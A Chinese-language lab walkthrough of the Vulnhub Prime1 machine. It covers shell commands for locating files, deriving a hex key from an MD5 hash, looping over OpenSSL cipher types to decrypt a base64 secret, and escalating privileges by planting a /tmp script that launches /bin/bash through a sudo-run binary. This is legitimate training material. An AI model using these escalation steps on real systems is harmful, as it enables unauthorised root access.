Vulnhub靶机实操笔记-Prime1-解法二

 cd /home/saket
 ls -liah
 ./enc
 strings enc #尝试查看enc的内容
 file enc #尝试直接读取enc

 find / -name '*backup*' 2>dev/null | sort | less
 
 find #查找文件命令
 2>dev/null #将报错文件丢除
 sort #将结果排序
 less #分页

 sudo echo -n 'ippsec' | md5sum | awk -F ' ' '{print $1}'
 
 -n #不输出结尾的换行符
 md5sum #md5的加密形式
 awk #awk是文本处理工具
 -F #以什么条件进行分割条件,本例子是用空格进行分割

 echo -n '需要解密的内容' | openssl enc -d -a -CipherType -K '16进制的key值'
 
 -n #不输出结尾的换行符
 -d #解密
 -a #指定编码

将CipherTypeRaw文件中的空格全部替换成\n换行
 sudo awk '{gsub(/ /,"\n"); print}' CipherTypeRaw
 
 gsub #替换\\中间的内容
 CipherTypeRaw #操作的文件名名称

 sudo awk '{gsub(/ /,"\n"); print}' CipherTypeRaw | sort | uniq | wc -l
 sudo awk '{gsub(/ /,"\n"); print}' CipherTypeRaw | sort | uniq >CipherTypes
 
 gsub #替换\\中间的内容
 CipherTypeRaw #操作的文件名名称
 sort #结果排序
 uniq #结果取唯一值
 wc -l #统计结果
 >CipherTypes #是将结果输出到文件CipherTypes上

 sudo openssl enc --help #详细查看enc下面的使用方法
 
 -K #看到带这个key是需要16进制的hex，并不是传入前面生成的md5值

 man od
 
 -A参数
 
 
 -A #指定RADIX为在doxn四种中的一种，例子选择的是none
 -t #指定类型，例子需要指定x1

 单字节转16进制：使用ASCII码表将每个字符转换为对应的16进制值。例如，字符串 "A" 的16进制表示为 "41"，其中 "41" 是字符 "A" 在ASCII码表中的十六进制表示。
 
 双字节转16进制：使用Unicode字符编码标准将每个字符转换为对应的16进制值。例如，字符串 "中" 的16进制表示为 "4E2D"，其中 "4E2D" 是字符 "中" 在Unicode编码表中的十六进制表示。
 
 对于判断是使用双字节还是单字节转16进制，您需要查看当前编码方式，主要有以下三种：
 
 ASCII编码：该编码方式只支持单字节字符，因此在此编码方式下，将字符串转换为16进制时只需要使用单字节转换方式即可。例如 "ippsec" 就是单字节。
 UTF-8编码：UTF-8编码是一种可变长度字符编码方式，支持单字节和双字节字符。在此编码方式下，单字节字符采用单字节转换方式，而双字节字符采用双字节转换方式。例如 "中文" 就是双字节字符。
 UTF-16编码：UTF-16编码是一种双字节编码方式，因此在此编码方式下，所有字符都是双字节字符，需要使用双字节转换方式。例如 "英文" 在UTF-16编码方式下也是双字节字符。
 
 根据上述规则，如果字符串 "ippsec" 是使用ASCII编码的，则将其转换为16进制时只需要使用单字节转换方式；如果是使用UTF-8编码，那么需要对其中的双字节字符使用双字节转换方式。

 sudo echo -n 'ippsec' | md5sum | awk -F ' ' '{print $1}' | tr -d '\n' | od -A n -t x1 | tr -d '\n' | tr -d ' '
 
 -n #不输出结尾的换行符
 md5sum #md5的加密形式
 awk #awk是文本处理工具
 -F #以什么条件进行分割条件,本例子是用空格进行分割
 tr #可以对来自标准输入的字符进行替换、压缩和删除。
 -d #删除字符串

 for Cipher in $(cat CipherTypes);do echo 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bF[91/498]
 yvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -$Cipher -K 3336366137346362336339353964653137643631646233303539316333396431 2>/dev/null ;echo $Cipher;done
 
 for Cipher in $(cat CipherTypes);do echo -n 'xxxxxxxxxxxx' | openssl enc -d -a -$Cipher -K xxxxxxxxxxxxx 2>/dev/null ; echo $Cipher;done
 
 
 写了bat脚本遍历CipherTypes文件中的参数，将参数传给变量Cipher
 -n #openssl的bug，有的时候需要，有的时候不需要。具体取决于解密的xxxxx内容
 中是否有包含\n换行符。如果有换行符时候需要保留-n,里面内容没有时就把不需要
 -n
 do #后接具体执行操作语句命令
 2>dev/null #将报错信息丢除
 done #结束bat脚本命令

echo 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -aes-256-ecb -K '3336366137346362336339353964653137643631646233303539316333396431'

uname -a

sudo -l

cat etc/crontab

sudo /home/victor/undefeated_victor

 cd /tmp
 echo '#!/bin/bash' >challenge
 echo '/bin/bash' >>challenge
 chmod +x challenge
 sudo /home/victor/undefeated_victor
 whoami